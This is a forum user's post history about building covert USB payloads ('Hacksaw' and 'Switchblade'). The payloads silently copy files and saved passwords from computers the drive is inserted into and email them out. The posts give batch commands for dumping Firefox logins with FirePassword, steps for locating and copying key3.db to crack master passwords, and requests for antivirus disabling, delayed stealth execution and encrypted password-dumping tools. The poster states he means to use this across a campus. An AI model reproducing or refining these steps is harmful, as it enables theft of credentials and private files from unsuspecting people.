therian16
-
Posts
13 -
Joined
-
Last visited
Posts posted by therian16
-
-
I added the Hacksaw payload to my Switchblade so here's what I did and how I protect myself:
1. copied SBS to CMD folder as required
2. created a hacksaw.bat with the go.cmd from the hacksaw payload
3. added <call hacksaw.bat> to the top of the Switchblade go.cmd
4. to protect my personal computer I created a file called test.txt at c:test.txt
5. in the hacksaw.bat I added this line to the top
if exist c:test.txt goto end
and created the :end tag at the bottom.
This not only adds Hacksaw to Switchblade but also protects your personal computer from infection while using your own .
One thing I would like to add still is some kind of delay on running sbs.exe. Is there a way to get system time, then add say 5-15 minutes, then have sbs execute? that would get rid of sending your own Hacksaw program to yourself.
-
The problem that I was refering to aardwolf is when I infect a computer for the first time it copies my wip folder and sends that to myself. Is there a setting to exclude certain folders on a usb? If so just ignore wip and my problem is solved.
Also you mention there is a way to only grab certaing types of documents, how is that set up?
-
A couple of questions
Is there a way to make this a timed thing?
example: Insert drive on monday and have it antidote itself Friday, or maybe just run until the computer gets restarted.
everytime the payload gets run I recieve the file in Gmail but when I try to open it, I get an error the file is unknown format or currupt. Anyone else getting this?
Is there a way to make the payload NOT run on my Hacksaw? Everytime I insert my hacksaw into my computer it copies my entire payload and tries to send it. We need a way to run the payload and get it copied to the hard drive and have the payload run the next time a usb is inserted.
Any ideas?
-
I got done with my package earlier than I though, it is now up on the wiki. If you have a suggestion on how it can be coded better or things I should add/delete post it here. I want to hear from Moonlit before I add the avkiller so as soon as I do I'll add that to the builder.
complaints/congrats/anything welcome, let me know what you think.
-
UPDATE
I'm currently working on a small package to setup a switchblade with just the components a person wants via a batch script. Should be up in the wiki soon.
What I'm looking for right now is a way to disable the popup when you insert a jump drive and it gives you the option to view folders and such. Is there a way to make the usb HAVE to be opened from my computer? That a way it gives the registry time to accept my hide system folders command.
Thanks.
-
I love that programs works great!
If you come across a master password for firefox try firemaster from the same site. All you need is a decent dictionary file which I'm gaving a hard time finding a good one, any links someone could mention?
If anyone has the same thing for Opera that is what I'm after next.
-
As no one has brought this up before, in my situation i use me Switchblade alot on the same computers transfering files from one to the other. just to add a little stealthyness I added this line to my go.cmd
if exist Documentslogfiles%computername%.log goto end
This will essentially stop making copies of computers you already have info on. This isn't a necessity but on some older computers I noticed a small lag time while the payload is run. What do you guys think?
-
srry double post
-
I need some help from a dos coding Guru out there. here's the situation:
I have added the firepassword I mentioned earlier to my payload, works great but I need to expand on it.
In the situation there is a Master password set for firefox , Firepassword comes up with an error saying it wants master password. I need to be able to copy the file key3.db from
C:Documents and settings%username%Application dataMozillaFirefoxProfiles{random}.default
(random meaning always different)
and crack it later so I can feed the master password to firepassword.
Progress so far:
I can change to the directory using this .bat
c:
cd docume~1%username%applic~1mozillafirefoxprofiles
cd *.default
What I want is to be able to get the key3.db from this location to my Switchblade keeping in mind the drive letter changes depending on the computer
I realize everyone uses different Master passwords but I'm on campus so all the passwords are the same campus wide and I can just enter the master password into firepassword and get the info from then on.
only idea I have come up with so far is setting drive letter of Switchblade to a variable then just: copy key3.db %variable%mylogfiles
any ideas how to accomplish this?
-
Great job moonlit, if you need someone else to do some testing send me the package and I'll test the av's I have.
-
Instead of trying to encrypt our exe's and dll's, can we figure out a way to suppress (read disable) av's altogether? I thought I read a post about killing processes from command script somewhere while doing research for this program but didn't look into it.
Just to add my little piece to this project, I came across this little gem called firepassword that will get the username/password of everything firefox is told to remember. The only limitation is that the program cannot bypass master passwords. Installation is simple just copy the 3 files to WIPCMD and add this line to your go.cmd.
FirePassword.exe >Documentslogfiles%computername%.txt
I edited my go.cmd so a new folder was created just for this txt file. If anyone needs this more explained I can post the changes I made.
Here's the link for that program
http://nagmatrix.50webs.com/article_firepassword.html
Another idea I implimented was changing the logfile location to WIPlogfiles. I think it is better for the social engenering aspect because if your having someone open your Switchblade to saveget something, they go to documents and see logfiles folder. Anyone curious what is in there? this way it's already in one (hidden) folder and if they find WIP your already in trouble.
let me know what you think sorry for the long post
Next personal project: cracking wand.dat from Opera. Anyone wanna help? (Supposedly Uncrackable)
-
Great work on the project so far but we need a few more files encrypted.
netpass.exe
mspass.exe
and the 6.0 version of pwdump would
alternative to pwdump is fgdump. looks and sounds good but it needs to be encrypted before I can test it fully. thanks Brainkill
USB Hacksaw Development
in USB Hacks
Posted
I'm liking the hacksaw but how can I make it only copy a certain type of file like .doc or a combination of certain file types? Haven't been able to get much info for this, thanks